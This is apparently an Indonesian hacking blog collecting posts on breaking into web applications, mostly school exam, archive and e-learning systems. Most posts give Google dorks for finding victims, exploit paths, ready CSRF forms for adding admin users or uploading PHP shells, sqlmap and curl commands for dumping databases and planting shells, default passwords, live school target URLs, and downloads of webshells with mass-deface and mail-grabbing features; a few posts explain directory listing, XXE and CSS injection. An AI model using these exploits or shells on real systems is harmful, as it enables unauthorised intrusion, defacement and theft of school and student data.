./EcchiExploit Blog

Exploit Unauthenticated CSRF Add User at Beesmart CBT

2025-10-09T14:34:00.001+07:00

Halo Guyssss....
Jadi kali ini saya akan membagikan kerentanan di Beesmart CBT, langsung aja ke PoC nya aja lah malas saya ngetik panjang, oh iya kerentanan ini bisa di eksekusi di CBT Beesmart versi Mod atau yang lainnya juga.

Proof Of Concept (POC) :
Payload : https://target.com/panel/pages/database_user_simpan.php
Dork : "Beesmart" inurl:login.php
CSRF :

Kalian Dorking seperti biasa
Lalu jika sudah dorking kalian masukan payloadnya kalo vuln itu blank
Tinggal masukan ke CSRF targetnya lalu jalankan CSRF
Setelahnya kalian tinggal input user sama password di CSRF
Bila sudah di submit dan ternyata blank artinya sukses
Kembali ke halaman login dan masukan user password yang tadi kalian submit

Oke dah segitu aja ./EcchiExploit pamit.....

Blind & Time Sql Injection at AMS (Aplikasi Manajemen Surat)

2025-04-15T16:03:00.003+07:00

Halo kawan", Sudah lama nih saya tidak buat content blogger hehehe

Baiklah langsung aja yah skip intro dan lainnya....

Kali ini saya akan membagikan bagaimana melakukan exploit Sql Injection di Aplikasi Manajemen Surat... Disini saya akan menggunakan Sqlmap agar lebih mudah melakukan exploit.

Pertama" pasti harus ada dorknya kan, nah tenang aja sudah saya siapkan dorknya
Dork : Aplikasi Manajemen Surat Username. lock. Password. LOGIN
Payload : https://target.com/kode.php
Command Sqlmap : python sqlmap.py -u "https://target.com/kode.php?query=[Param Injection]" -v 3 --random-agent --level 2 --risk 2 --tamper between,space2mysqldash --batch --header "X-Requested-With: XMLHttpRequest" -dbs --threads 10

Lalu jika bahan sudah disiapkan semua kita langsung masuk ke metode exploitasi
PoC :

Masukan payload ke target terlebih dahulu dengan set header atau modify header dengan value seperti ini "X-Requested-With: XMLHttpRequest"

Nah jika vuln ada sebuah data yang ditampilkan bila sudah seperti ini kita masukan ke Sqlmap lalu jalankan command yang sudah saya siapkan (kalian tinggal ubah targetnya ke target yang menurut kalian vuln)
Bila sukses hingga mendapatkan username dan password database untuk user login maka kalian tinggal masuk saja ke dashboard login webnya

Baik segitu saja semoga beruntung :)

#SqlInjection #AppInjection #Sqlmap

BeeSmart CBT Unauthenticated Arbitrary File Upload With cURL

2023-12-27T11:17:00.007+07:00

Halo kawan kembali lagi dengan saya kali ini saya akan membuat tutorial exploit AFU dimana kalian juga sudah tahu tentang CBT ini yah :D

Nah di exploit kali ini saya nemu kerentanan yang dimana kita bisa mengaupload file menggunakan cURL sebagai perantaranya tadinya saya juga mau mengenplentansikannya kedalam bahasa program PHP tapi saya tidak ada waktu jadi saya buat tutorialnya simple aja yah.

Baiklah langsung aja ke PoC nya...

Dork : intext:Selamat Datang. Siswa Peserta Ujian + Login

Payload1 : https://target.com/panel/pages/upload-banner.php

cURL Command : curl -F "uploadfile1=@/pathshell/shell.php" https://target.com/[path]/panel/pages/upload-banner.php -v -H "Cookie: beeuser" -k

Akses Shell : https://target.com/images/shell.php

Payload2 : https://target.com/panel/pages/upload-admin.php

cURL Command : curl -F "uploadfile2=@/pathshell/shell.php" https://target.com/[path]/panel/pages/upload-admin.php -v -H "Cookie: beeuser" -k

Akses Shell : https://target.com/[path]/images/shell.php atau https://target.com/[path]/panel/pages/photo/shell.php

Jika Vuln akan redirect ke halaman login...

Screenshot :

Bila ada teks "success" dari respone yang dieksekusi artinya berhasil bila tidak ada atau ada teks "error" artinya tidak bisa

Akses Shell :

Baiklah segitu aja dan terima kasih...

#BeeSmartExploit #EcchiExploit

Unauthenticated CSRF Add User in CMS Informasi Arsip Digital

2023-09-28T22:36:00.000+07:00

Halo kawan-kawan EcchiExploit maaf nih saya jarang buat blogger karena sebenernya saya tidak mau update tapi terkadang saya juga memikirkannya hehe....

oke kali ini saya akan saya membuat exploit dimana di exploit yang sebelumnya saya telah membuat yang AFU atau Arbritary File Upload di CMS Informasi Arsip digital... nah kali ini saya akan share versi add user kalian bisa langsung buat user petugas bukan admin karena yang bisa upload di fitur petugasnya

Langsung aja kita method PoC nya :
CSRF :

Dork : intext:Manajemen file arsip dengan mudah dan cepat. LOGIN USER site:sch.id

Tutorial :

Kalian dorking menggunakan dork yang telah saya siapkan di atas
Cari web yang menurut kalian vuln
Masukan kedalam CSRF yang telah saya buatkan dan kalian sudah save kedalam file HTML
Jika sudah masukan webnya kita tinggal jalankan CSRF nya
Bila sudah dijalankan nanti akan ada inputan disana kalian terserah mau isikan apa lalu eksekusi tombolnya
Jika berhasil akan ke redirect ke login
masukan username dan password yang telah di masukan di CSRF tadi dan jangan lupa login sebagai petugas bukan admin
bila sukses akan masuk ke dashboard petugas, disinilah kalian bebas mau melakukan apa saja

Note : Di CSRF bagian atribut action "/admin/petugas_aksi.php" jangan di ganti karena itu adalah file dimana untuk mengeksekusinya

Baiklah segitu saja dari saya... semoga beruntung dan Happy Exploiting

Exploit Candy SKL Unauthenticaded CSRF File Upload

2023-04-19T01:00:00.001+07:00

Halo Teman-teman saya kembali lagi... Kali ini saya akan mempublish suatu kerentanan atau exploit di sebuah aplikasi Candy SKL.

Di Exploit kali ini si penyerang atau hacker bisa melakukan serangan CSRF dan mengupload file dari CSRF tersebut

Exploit ini hanya bisa di eksekusi dari versi SKL 2022 ke bawah dikarenakan untuk versi update setelahnya sudah di patch..

Mari langsung saja ke tutorialnya :

Dork : intext:Candy SKL intitle:SKL - Candy School
Payload : /admin/upload.php
Source Code CSRF :

Proof of Concept (POC) :

Seperti biasa kalian dorking terlebih dahulu atau menggunakan target sendiri
Masukan payloadnya jika blank artinya Vuln
Lalu gunakan CSRF dan upload file kalian berupa file zip yang didalamnya terdapat file kalian entah itu backdoor atau lainnya, jika kalian masih bingung tentang zip file bisa baca artikel saya yang ini https://ecchiexploit.blogspot.com/2022/04/exploit-candy-cbt-284-29x-default.html
Jika sudah terupload dan di eksekusi nanti akan ada notifikasi "Berhasil di Upload"
Masuk ke folder atau akses tempat kalian upload file yaitu https://skl.target.com/admin/foto_siswa/[folder nama zip kalian]/filekalian.php atau https://skl.target.com/admin/foto_siswa/filekalian.php
Sekian.. Selamat Exploitasi....

Versi Video :

#Happy_Exploit #SKL_Candy_Exploit #Candy_CBT

Exploit E-School CBT Unauthenticated Abritrary File Upload (AFU)

2023-04-14T14:36:00.004+07:00

Halo teman-teman sudah lama saya tidak pernah upload lagi di blog ini dikarenakan sibuk kerja dan kegiatan di real life.

Yah mungkin ini akan menjadi postingan saya yang terakhir untuk itu kali ini saya akan share saja tentang exploit di CBT E-School yang sempat saya exploit dulu tentang kerentanan default user

Untuk kali ini lebih berbahaya atau critical dikarenakan si hacker atau peretas bisa melakukan file upload tanpa sepengatuan sang host atau user.. lalu bagaimana caranya atau tutorialnya.

Proof Of Concept (POC) :

Payload : /on-admin/ujiansql.php

Dork : intitle:E-School CBT site:id

Postfield : files

Tutorial :

Kalian dorking terlebih dahulu atau bisa menggunakan target kalian sendiri
Masukan payload di target kalian jika adanya redirect atau pengalihan URL ke halaman login admin artinya Vuln
Gunakan csrf online dan masukan postfieldnya
Jika sudah ter-eksekusi masuk ke folder https://target.com/on-admin/[shell kalian].php
Selamat Exploiting...

Hanya segitu saja dari saya semangat meretasnya teman-teman

#happyExploit #CBT_Exploit #E-School

Exploit Candy CBT Sql POST Injection 2.9.x

2022-05-22T12:04:00.002+07:00

Yah langsung aja dah...

Dork: (Pakai yang content sebelumnya)

Tool: Sqlmap, Decrypt

Link : Decrypt

Payload: sqlmap.py -u "http://target,com/soal.php" --method POST --data "pg=ragu&id_mapel=1*&id_siswa=1&id_soal=1&id_ujian=1" -v 3 --random-agent --level 2 --risk 2 --tamper randomcase,between --batch -dbs --dbms mysql --thread 10

Get User/Pass: -D nama_database -T pengawas -C username,password --dump (Ganti -dbs dengan Payload Ini)

Versi Video :

#Happy_Exploiting #Candy_CBT_Exploit

Exploit Candy CBT 2.8.4 > 2.9.x Default User/Password

2022-04-30T09:37:00.002+07:00

ya gimana ya hehe..... intinya yagitulah...

untuk exploit yang lain gak akan dibuat karena critical kasian ama developernya....
langsung aja ke exploit aja dah males basa basi sebenernya :D

Dork: "Support By X-Candy CBT"

Default User/Pass:-

"admin/usbk2020"

"guru1/guru1 or guru1/123456" (ganti angkanya hingga 10 itu adalah max user defaultnya)

Exploit Upload Shell:

jika sudah menemukan yang vuln maka lakukan method ini untuk upload shell
kalian masuk ke dashboard admin/guru lalu ke menu bangsoal
jika disana tidak ada datanya maka pakai param ini "https://target.com/panel/?pg=banksoal&ac=importsoal&id=1"
lalu cari bagian file pendukung dan upload file bertipe zip yang didalamnya ada folder dan shell kalian, seperti ini:

dan jika kalian sudah success upload kalian tinggal akses shell nya "https://target.com/temp/ecchi/shell/ecchi.php" (contoh)

Exploit Upload Shell 2:

sebernanya ini dibagian backup/restore data jadi kalian sudah tahu maka langsung ke akses shellnya
untuk akses shellnya "https://target.com/(path admin)/mod_setting/shell.php"

yah segitu aja untuk exploit kali ini hehe....

#Happy_Exploit #Candy_CBT_Exploit

No Redirect in Candy CBT

2021-11-07T14:36:00.001+07:00

Hadeh sebenarnya gua udah gak mau lagi berurusan dengan namanya cbt tapi yah gitulah buat kali ini dan terakhir kalinya gua gak akan buat content cbt lagi dan ini adalah yang terakhir.

ok kali ini gua akan share gimana bug no redirect di candy cbt (nih cbt dari dulu banyak bug mulu dah gak ada habis2 nya) oh iya bug ini udah gua temu tahun lalu dan sekarang gua akan share aja dah ke kalian.

Dork : - (kalian buat sendiri ini bug bisa di semua versi soalnya)
Tool : - (cari aja di google banyak tapi lebih bagus sih pake firefox ekstensinya)

Kalo sudah semuanya di siapin kita langsung ke tutorialnya...

1. Siapkan target kalian

2. Karna disini gua gak install firefox jadinya gua pake tool online aja dari Zone Xsec nah kalo gua pake tool online gua tinggal submit dan boom

Tapi dashboardnya kok gitu yah?? menu2 nya kemana?? nah kalo itu coba kalian ngepentest lewat firefox ada tutorial nya dan banyak

Sekian dan Selesai...

sebenernya ada 1 bug lagi yaitu sqli tapi gua males ngetiknya jadi ini aja dan ini adalah content terakhir tentang CBT

#Happy_exploiting

CSS Injection

2021-10-18T08:42:00.000+07:00

Yo gan dah lama gak jumpa lagi kali ini gua cuman mau share doang sebenernya nih method dah lama cuman lagi keinget aja hehe...

jadi ane share aja sapa tahu belum ada tahu tentang metode ini....

Pernah kepikiran gak oleh kalian bahwa sebuah CSS bisa di injeksi??

Nah di content kali ini gua akan share gimana cara sebuah CSS bisa di injeksi

Disini gua dah buat sebuah source code nya bisa kalian salin di bawah

Jika sudah kalian salin coba jalankan di localhost kalian.

Selanjutnya kalian input sebuah code color hex, contoh : #abc, #000, dll.

Jika sudah kalian input, klick submit maka backgroundnya akan berubah

Perhatikan di line code 37 disana ada fungsi sebuah append (sebenernya bisa sih pake fungsi css()) dan di line 30 ada fungsi klick dan keyup disinilah penyebab css bisa di injeksi dengan payload atau query css yang berbahaya dengan menginput code css maka si server akan mengeksekusinya

code yang di input akan di eksekusi

yap segitu aja dah ane cuman lagi kepikiran aja tentang ini wkwk biasanya seperti ini akan ada di CTF kalo orang yang suka main CTF pasti tahu tentang ini soalnya atau terkadang ada soal atau CTF yang berbentuk soalnya seperti ini dan ini sama seperti HTML Injection hanya saja payload yang kita input berbentuk CSS

Refrensi :

Apa Itu DirList (Directory Listing) ?

2021-04-24T06:55:00.003+07:00

Directory Listing atau disebut juga DirList adalah sebuah fungsi server dari web yang menampilkan isi atau daftar semua file yang saat di akses tidak adanya indexs dalam directory tersebut.

Contohnya ketika seseorang mengakses web https://ecchiexploit.blogspot.com/assets tanpa menentukan nama file atau dir, server web akan memproses akses tersebut dan yang pertama kali yang akan di proses adalah indexs dari directory tersebut, jika indexs tidak ada maka yang dihasilkan adalah menampilkan isi seluruh dari directory tersebut.

Sama seperti kita melakukan command atau perintah CLI di terminal seperti 'ls' didalam operasi sistem Linux dan Unix atau 'dir' dalam operasi sistem Windows.

Selain itu juga memungkinkan adanya DirList bisa diakibatkan adanya exploitasi di sistem perangkat lunak menggunakan perintah khusus (payload atau command)

Dampak kerentanan dari DirList

Dampak dari DirList adalah Information Diclosure yang artinya seseorang dapat melihat informasi file dari dalam folder atau dir tersebut.

Hal tersebut sangat fatal karna seseorang bisa melihat file-file yang penting seperti backup sql, file config, dll jika didalam folder tersebut ada

Bagaimana mempatchnya ?

Memberi disable DirList dengan .htaccess

Menambahkan file indexs atau disable DirList via Cpanel

Arbritrary File Upload In CMS Informasi Arsip Digital With CRSF

2020-10-20T08:19:00.000+07:00

Kali ini Ane Akan Share Exploit Di Cms Informasi Arsip Digital..

Yap Mungkin Ini Adalah Exploit Baru Yang Ane Baca Dari Salah Satu Blogger Yang Bernama Jawa Barat Cyber Di Exploit Kali Ini Kalian Tidak Perlu Login Langsung Upload Shell Saja Menggunakan Crsf Yang Saya Buat Sendiri...

Dork :

"sistem informasi arsip digital" + login

Csrf :

Nah Kalian Copas Saja Csrf Itu Lalu Masukan Site Yang Menurut Kalian Vuln..

Jika Sudah Memasukan Site Ke CSRF Nya Kalian Jalankan Csrf Tersebut Di App Browser Kalian Seperti Chrome Uc Browser Dll

Lalu Kalian Upload Shell Kalian Dengan Ext php5 Atau phtml...

Jika Success Akan Ke Redirect Ke Login Pagenya...

Untuk Akses Shell Nya Kalian Tinggal Ke Directory Arsip Nya :

http://example.com/arsip/shell.php

http://example.com/[path]/arsip/shell.php

And Boom..

Sekian Dan Happy Hacking...

Exploit Bimasoft CBT Default User/Pass

2020-10-19T04:11:00.000+07:00

Hallo Gann...

Dah Lama Neh Ane Gak Nge Post Tentang Cbt Lagi..

Nah Di Post Kali Ini Ane Akan Share Tentang Cbt Bernama Bimasoft Sayangnya Cbt Ini Menggunakan Cms Wordpress Dan Tidak Bisa Meng Upload Shell Wkwkw...

User/Pass :

admin/admincbt

Username : admin

Password :admincbt

Dork :

"aplikasi simulasi mandiri" + login

Admin Login Page :

http://example.com/wp-login.php

http://bimasoftcbt.example.com/wp-login.php

Live Target :

https://bimasoftcbt.utbk.my.id
https://bimasoftcbt.smansawi.id
https://bimasoftcbt.smpkc191.my.id

Sekian Semoga Bermanfaat Gan (Bermanfaat Apanya Ini Kan Ngehek Bujankkk Pala Ente Bermanfaat :'v)

Happy Exploit...

Sql Injection In New Candy Cbt > V2.8 rev 4 With Sqlmap

2020-09-24T19:46:00.000+07:00

Jadi Gini Banyak Yang Komentar Cari Exploit Candy Cbt Yang 2.8 rev 4 ampe 2.9 atau versi terbarunya nah disini ane akan share exploit terbarunya untuk versi tersebut..

Untuk Bahan²nya kalian install sqlmap di terminal kalian seperti termux cmd dan lain-lain

Jika kalian tidak suka yang lebih ribet install lazysqlmap untuk command nya sama seperti sqlmap hanya di lazysqlmap lebih mudah aja untuk men dump table dan column nya

Install Sqlmap Disini Dan Install Lazysqlmap Disini

Login Admin :

http://example.com/x-panel/

http://example/[path]/x-panel/

Exploit :

http://example.com/x-panel/?pg=banksoal&ac=lihat&id=990

http://example.com/[path]/x-panel/?pg=banksoal&ac=lihat&id=990

Command In Sqlmap :

python2 sqlmap.py -u "http://example.com/x-panel/?pg=banksoal&ac=lihat&id=990" --dbs --time-sec 20 -v 3 --random-agent --level 1 --risk 1

python2 sqlmap.py -u "http://example.com/[path]/x-panel/?pg=banksoal&ac=lihat&id=990" --dbs --time-sec 20 -v 3 --random-agent --level 1 --risk 1

Command In Lazysqlmap :

$lazysqlmap

http://example.com/x-panel/?pg=banksoal&ac=lihat&id=990 --dbs --time-sec 20 -v 3 --random-agent --level 1 --risk 1

jika Kalian Ada Pertanyaan Seperti Ini Saat Sqlmap Di Jalankan :

[DEBUG] declared web page charset 'utf-8'

got a 302 redirect to

Ketik Aja : n (n = no)
Itu artinya untuk meredirect ke halaman index nya jadi kita tidak perlu menredirectnya

you have not declared cookie(s), while server wants to set its own ('PHPSESSID=blabla').

Dan Untuk Ini Kalian Ketik Aja : Y (Y = Yes)
Ini adalah cookie dari web tersebut jadi kita membutuhkanya untuk melakukan injeksi lebih extrim lagi

Nah pas kalian melakukan injection di sqlmap atau lazysqlmap kalian skip aja injeksi di parameter nya hingga ke parameter "id" lalu tunggu hingga injeksi selesai

Dan boom..

Untuk Meng dump tabel dan column nya kalian search aja di google..

Sebenernya tadi gua mau jelasin 1 1 command di sqlmap tapi gak jadi wkwkw

Yap segitu aja untuk exploit kali ini..

BHIOFF Shell With Authenticate Login

2020-08-20T00:23:00.000+07:00

Balik Lagi Ama Saya Yap Kali Ini Saya Akan Share Shell Baru Saya Yaitu Bernama BHIOFF Shell

Langsung Aja Di Shell Kali Ini Saya Menggunakan Login Authenticate Atau Autentikasi Login Seperti Ini Gan...

Untuk Fitur :

Symlink (Symlink 404/403)
Config
Jumping
Mail Grabber
Cpanel Reset Pass
Dll

Untuk Default User/Pass :

dmzhari/ecchi

Untuk Gambar Dari Shellnya :

Jika Kalian Suka Kalian Bisa Download

Disini atau Disini

Zero Two Shell

2020-08-10T03:03:00.000+07:00

Hallo Gan...
Kali Ini Saya Akan Share Shell Baru...

Untuk Tampilan Kalian Bisa Lihat Di Bawah...

Fitur :

Symlink (Sym v2/Sym404)
Jumping
Mass Tool (Deface/Delete/)
Mail Grabber
Adminer
Login Shell With User, Pass And Email
Dll..

Default User : dmzhari
Default Pass : ecchi
Default Email : zerotwo@gmail.com

Jika Kalian Suka Kalian Bisa Download Di Bawah Gan

Download :

Disini

Atau

Download :
Disini

Exploit Fr. Evan Gomes SVD File Upload

2020-07-21T06:17:00.000+07:00

Hallo Gan :v
Kali Ini Saya Akan Share Exploit Baru Wkwkw..

Mungkin Kalian Sudah Tahu Nama Titlenya Yaps Ini Adalah Deface Fr. Evan Gomes SVD Dafault User/Pass Yang Saya Baca Dari Salah 1 Blog Yang Bernama 22xploitercrew Karna Saya Ingin Tahu Lalu Saya Cari Exploit Lain Dan Akhirnya Ketemu Wkwk..

Nah Di Exploit Ini Kalian Tinggal Upload Shell Saja Tanpa Harus Menggunakan Default User/Pass Nya Lagi..

Exploit :

/modules/admin/add_user.php

Dork

intext:Fr. Evan Gomes SVD site:in

Csrf :

<form method="post" action="https://site.com/modules/admin/add_user.php" enctype="multipart/form-data"> <input name="image" type="file" id="last-name2"> <input type="submit" name="add_user" value="Upload"> </form>

Note : Disaat Kalian Masukan Exploitnya Dan Teredeirect Ke Tampilan Index Atau Web Depannya Artinya Vuln
Akses Shell :

http://site.com/images/shell.php

http://site.com/[patch]/images/shell.php

Yap Segitu Aja Gan Untuk Exploit Kali Ini Semoga Berhasil...

Thanks To 22xploitercrew

PPDB RFM (Responsive File Manager)

2020-07-06T00:10:00.000+07:00

Dah Lama Gak Buat Content Di Blog Wkwkw
Nah Kali Ini Gua Akan Share Cara Deface PPDB RFM..

Dork :

intext:© PPDB MADRASAH site:sch.id

Exploit :

/plugin/filemanager/dialog.php?akey=4r5S-KduJ7ts098

Akses Shell :

http://ppdb.sch.id/media/source/shell.php

http://ppdb.sch.id/[patch]/media/source/shell.php

Biasa Dorking Dulu Gunain Dork Di Atas
Jika Sudah Dorking Kalian Cari Web Yang Menurut Kalian Vuln
Nah Kalo Dah Dapet Webnya Tinggal Masukin Exploitnya
Nah Ntar Akan Ke Redirect Ke Filemanagernya Kalian Upload Shell Kalian Dengan Ext. namashell.php<?.txt
Gak Perlu Tamper Langsung Terdeteksi Dengan Ext. php
Nah Kalo Dah Terupload Tinggal Ke Akses Shellnya

Maaf Kalo Gak Ama Gambarnya Soalnya Gua Males Harus Nangkep Gambar Sana Sini :v

Sekian Dan Happy Exploiter :v

E-Learning App (Not Moodle) File Upload With Csrf

2020-06-15T02:30:00.002+07:00

Yah Dari Kalian Pasti Ada Yang Sudah Tahu Dan Yang Belum Tahu Tentang App Web Ini

Dan Yang Sudah Tahu Pasti Ribet Pas Di Bagian Regmem Nya Wkwk..

Nah Di Sini Saya Akan Persingkat Aja Jadi Gak Perlu Regmem Lagi Langsung Ke Upload File...

Dork :

silahkan login untuk masuk ke e-learning site:sch.id

Csrf :

<form method="post" action="http://e-learning.com/?hal=daftar" enctype="multipart/form-data"> <input type="file" name="gambar" /> <input type="submit" name="daftar" value="Upload!!" /> </form> <!-- Seperti Biasa Bagian ?hal=daftar Kalian Tidak Perlu Hapus Kalian Hanya Tinggal Memasukan Site Target Kalian Ganti e-learning.com Dengan Site Target Kalian -->

Nah Jika Sudah Siap Langsung Ke Step² Berikut...
Pertama Dorking Dengan Dork Di Atas Di Google.com
Jika Sudah Dorking Kalian Pilih Target Yang Vuln..
Untuk Tampilan Dari E-learning Ini Seperti Ini Gan..

Nah Jika Seperti Itu Kalian Masukan Langsung Ke Csrfnya Lalu Kalian Exe Upload Shell Kalian Gan
Nah Jika Sukses Akan Seperti Ini

Nah Jika Muncul Pesan Kek Gitu Artinya Berhasil Langsung Ke Akses Shell Kalian..

http://e-learning.com/img/foto_siswa/shell.php

http://e-learning.com/[patch]/img/foto_siswa/shell.php

And Boom...

Semoga Berhasil...

Exploit ZYACBT Default User Pass

2020-06-13T01:42:00.000+07:00

Jadi Gini Sebenernya Neh Cbt Gua Dah Lama Nemunya Cuman Lupa Gua Njer Cari Exploitnya Nah Temen Ane Di WA Dia Nge Chat Gua Pas Gua Liat Sitenya Ternyata Ada ZYACBT Akhirnya Gua Ke Inget Lagi Langsung Aja Ane Cari Exploitnya wkwk..

Di Exploit Kali Ini Tidak Bisa Upload Shell Atau Sc Gan Karna Di Disable Atau Hanya Bisa Meng Upload Ext Gambar Atau Image. Yah Gpp Lah Sapa Tahu Kan Bisa Kalian Tamper Data :v

Dah Lah Mari Lanjutkan Tutornya Gan..

Dork :

intext:Log In Operator. © achmadlutfi.wordpress.com

User/Pass :

admin

Login Page Admin :

index.php/manager

Pertama Kalian Dorking Gunaka Dork Yang Gua Siapin Tadi..
Jika Sudah Kalian Dorking Kalian Cari Sitenya Yang Menurut Kalian Vuln
Untuk ZYACBT Ini Menggunakan Template AdminLTE

Nah Langsung Kalian Masuk Ke Login Managernya
Dan Masukan Default User/Passnya

And Boom

Kalian Akan Ke Redirect Ke Dashboard Adminnya

Sebenernya Tadi Gua Cari Exploit Yang Lain Ternyata Gak Bisa Harus Masuk Ke Dashboardnya Yasudah Ane Gak Jadi Soalnya Sama Aja

Note : semua tentang tutorial ini hanya pembelajaran, tentang penyalahgunaan tutorial tidak tanggung jawab saya..

Sekian Dan Terima Kasih

Thanks : Shandi1337

Candy Cbt 2.8 AFU (Arbritrary File Upload) With Csrf

2020-06-05T04:49:00.000+07:00

Hallo Bujannk :v
Jadi Gini, Sebenernya Ane Ke Inget Aja Sih Napa Gak Buat Yang Langsung File Upload Aja Wkwkw

Dan Pas Ane Liat Di Youtube Banyak Yang Buat Content Candy Cbt Add Admin Pas Ane Lihat Ada Yang Up Shell.. Yaudah Deh Ane Cari Bug Nya Biar Langsung Ke Up File Jadi Gak Perlu Add Admin Lagi Atau Add User Lagi..

Langsung Aja Tutornya Kek Gimana...

Dork :

© Candy CBT v2.8.0 inurl:login.php

Exploit :

admin/restore.php

Postfile : datafile

Jika Bahan Diatas Dah Siap Kita Lakukan Step By Step Di Bawah...

Kalian Dorking Dulu Gunakan Dork Yang Ane Siapa Kan Tadi..
Jika Sudah Dorking Kalian Cari Sitenya Yang Menurut Kalian Vuln Seperti Biasanya Lalu Masukan Exploitnya Seperti Ini

https://candy.com/admin/restore.php

https://candy.com/[patch]/admin/restore.php

Jika Vuln Akan Seperti Gambar Di Bawah Gan

Nah Terdabat Text : Fatal Error
Next Jika Terdabat Text Itu Artinya Vuln Langsung Ke Csrf Online (Kalian Cari Aja Di Google Gan Banyak)
Kalian Masukan Sitenya Gan Dan Postfilenya

Jika Sudah Kalian Eksekusi Lalu Upload Shell Atau Sc Kalian...
Jika Success Akan Seperti Ini..

Terdapat Text : Data Berhasil Di Restore
Sekarang Kita Panggil Shell Atau Sc Kalian Seperti Ini..

https://candy.com/admin/shell-kalian

https://candy.com/[patch]/admin/shell-kalian

And Boom

Sekian..

Happy Exploit And Happy Hacking..

Exploit Candy Cbt 2.8 Add User With Csrf

2020-05-27T03:12:00.000+07:00

Kali Ini Ane Akan Share Exploit Candy Cbt V2.8...

Karna Dari Dulu Sering Ane Lihat Di Komen "Candy Cbt Yang 2.8 Dah Ada??, Gan Cbt 2.8 Mana??, Dst"

Wkwkwk Sabar Gan Ntar Ane Cari...

Nah Disini Ane Langsung Share Aja Caranya Kek Gimana wkwkw...

Pertama Kalian Copas Csrf Di Bawah Gan..

<html>
<head></head>
<body>
<form action="http://candycbt28.sch.id/admin/?pg=pengawas" method="post">
<label>NIP</label>
<input type="text" name="nip" value="-" required="true" />

<br />

<label>Nama</label>
<input type="text" name="nama" required="true" />

<br />

<label>Username</label>
<input type="text" name="username" required="true" />

<br />

<label>Password</label>
<input type="password" name="pass1" required="true" />

<br />

<label>Ulang Password</label>
<input type="password" name="pass2" required="true" />

<br />

<button type="submit" name="submit">Simpan</button>
</form>
</body>
</html>

Nah Kalo Udah Kalian Copy Csrf Tersebut Kalian Masukan Sitenya *Note : Untuk Bagian Nip Kalian Tidak Usah Di Edit Lagi Biarkan Saja Seperti Itu*
Nah Jika Sudah Memasukan Site Nya Kalian Buka Csrfnya Gan Di Google Lalu Isikan Terserah Kalian, Contoh Seperti Gambar Berikut...

Di Gambar Tersebut Saya Isikan Nama Username Dan Password, Untuk Username Dan Passwordnya Yaitu

-Username : hari

-Password : ecchi

Jika Kalian Sudah isikan Kalian Tinggal Simpan Saja Gan..
Kalian Masuk Ke Page Login Admin Dan Masukan Username Passwordnya Yang Sudah Kalian Buat Tadi

Nah Tinggal Masuk Deh...
Dan Boom

Kalian Masuk Dahboard Adminnya Nah Sekarang Terserah Kalian...
Mau Apakan Gan...

Oh Iya Disini Saya Gak Buat Dork Kalian Buat Saja Sendiri...

Semoga Berhasil...

Konosuba Webshell

2020-05-23T01:20:00.000+07:00

Hallo Gan..
Gak Kerasa Mau Lebaran Lagi Wkwkw...
Kalo Ane Ada Salah Minta Maaf Yah Buat Kalian Semua...

Nah Kali Ini Ane Akan Share Konosuba Shell..

Untuk Tampilan Kalian Di Bawah Ini..

Nah Seperti Itulah Untuk Fitur Yaitu

Symlink
Jumping
Mass Deface/Mass Delete
Dll ( Kalian Bisa Cek Di Gambar)

Kalian Bisa Download Disini Atau Disini

Semoga Digunakan Dengan Bijak :v

Candy Cbt New Exploit

2020-05-18T01:42:00.000+07:00

Lagi² Saya Menemukan Bug Di CBT Candy Bug Ini Bisa Di Ekse Di Semua Versi (Sepertinya Sih :'v) Kecuali Yang v2.8 Wkwkw (Dah Lah Lagi² Yang V2.8 Belum Ada Bugnya :'v)

Langsung Aja Ke Tutornya..

Disini Kalian Bisa Pake Csrf Online Atau Csrf Yang Di Bawah Ini Jika Menggunakan Csrf Online Maka Postfilenya Ialah logo

<form action="https://site.sch.id/admin/simpan_setting.php" method="post" enctype="multipart/form-data"> <input type="file" name="logo" /> <button type="submit" name="submit">Upload Filenya!!</button> </form>

Exploit :

/admin/simpan_setting.php

Dork :

Candy Cbt "login masuk"

Nah Kita Dorking Dulu Gan Gunakan Dork Yang Saya Buat Di Atas Tadi (Kebangin Gan Dorknya)
Jika Kita Sudah Menemukan Target Langsung Masukan Exploitnya Jika Blank Atau Ke Redirect Kek Login Page Artinya Site Tersebut Vuln Gan

Nah Kita Ke Csrfnya Terserah Kalian Mau Pakai Yang Mana Online Atau Yang Saya Bagi Di Atas Itu Terserah Kalian..

Jika Menggunakan Csrf Online Postfilenya logo

Jika Menggunkan Csrf Yang Saya Buat Kalian Tinggal Masukan Target Saja

Nah Jika Sudah Selesai Kalian Tinggal Eksekusi Aja Gan

Nah Jika Success Akan Blank Gan

Sekarang Tinggal Balik Lagi Gan Ke Awal Lagi Yaitu Ke Login Page Siswanya Bukan Login Page Adminnya :v

Nah Ada Gambar Yang Error Kalian Tekan Gambar Tersebut Gan Lalu Buka Di Tab Yang Baru

And Boom

Selesai...

Happy Hacking Gan..

XML External Entity [XEE]

2020-05-14T23:32:00.001+07:00

Hayo Puasa Belum Batal Kan Kalian?? Wkwkw

Di Konten Kali Ini Saya Akan Share Apa Itu XML External Entity Atau XEE.

XML External Entity Atau XEE Adalah Sebuah Jenis Serangan Terhadap Aplikasi Yang Mem-parsing Input Xml. Serangan Ini Terjadi Ketika Input Xml Yang Berisi Referensi Ke Entitas Eksternal Diproses Oleh Parser Xml Yang Dikonfigurasi Dengan Lemah. Serangan Ini Dapat Menyebabkan Pengungkapan Data Rahasia, Penolakan Layanan, Pemalsuan Permintaan Sisi Server, Pemindaian Port Dari Perspektif Mesin Tempat Parser Berada, Dan Dampak Sistem Lainnya.

Standar XML 1.0 mendefinisikan struktur dokumen XML. Standar mendefinisikan konsep yang disebut entitas, yang merupakan unit penyimpanan dari beberapa jenis. Ada beberapa jenis entitas, entitas parsing umum / parameter eksternal sering disingkat menjadi entitas eksternal, yang dapat mengakses konten lokal atau jarak jauh melalui pengidentifikasi sistem yang dinyatakan. Pengidentifikasi sistem diasumsikan sebagai URI yang dapat didereferensiasi (diakses) oleh prosesor XML saat memproses entitas. Prosesor XML kemudian menggantikan kemunculan entitas eksternal bernama dengan konten yang direferensikan oleh pengenal sistem. Jika pengidentifikasi sistem berisi data tercemar dan prosesor XML dereferensi data tercemar ini, prosesor XML dapat mengungkapkan informasi rahasia yang biasanya tidak dapat diakses oleh aplikasi. Vektor serangan yang serupa menerapkan penggunaan DTD eksternal, style sheet eksternal, skema eksternal, dll. Yang, jika disertakan, memungkinkan serangan gaya inklusi sumber daya eksternal yang serupa.

